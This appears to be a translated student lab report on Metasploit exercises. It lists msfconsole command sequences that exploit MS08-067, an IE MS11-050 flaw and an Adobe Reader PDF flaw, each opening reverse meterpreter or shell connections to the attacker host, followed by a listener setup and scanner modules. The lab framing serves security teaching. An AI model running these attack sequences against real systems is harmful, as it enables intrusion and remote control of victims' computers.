1. Answers to basic questions
Explain what is exploit, payload, encode in your own words
- Exploit: The process of using some vulnerabilities in the target system to attack, except for the preparatory work, this step is to implement the attack.
- Payload: Payload, package the virus code into a program, etc., and cooperate with the vulnerability transmission we have prepared.
- encode: Encrypt and disguise the payload to cover it.
2. The practical process
1. Windows Service Penetration Attack - MS08-067 Security Vulnerability
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //攻击
2. Browser Penetration Attack - MS11-050
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit
3. Infiltration attack against Adobe Reader software - adobe_toolbutton
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击
Enter back on kali to exit the current module, enter the monitoring module, and enter the following command:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip
msf exploit(handler) > set LPORT 5213 //攻击端口固定
msf exploit(handler) > exploit
4. Apply any of the auxiliary modules.
- Using the scanner/http/prev_dir_same_name_file module
This module identifies files in the first parent directory with the same name as the given directory path. Example: PATH is Test / backup / files / will search for the file /backup/files.ext in the Test path, and .ext is the set file type.
- Use auxiliary/scanner/portscan/syn module
This module detects open ports by sending the TCP SYN flag. Below is my scan to my target drone,
3. What technologies or steps are still missing from actual combat?
How to securely transfer backdoor files or understand the vulnerability of the target drone, this is where I think there is a gap from actual combat.
Fourth, the experimental summary
This experiment made me feel like I was one step closer to the actual operation, and applied to many common vulnerabilities. However, we are still limited to some modules of msf, and it is difficult to get the generated file icons on the target machine, so we look forward to new breakthroughs in the next experiment.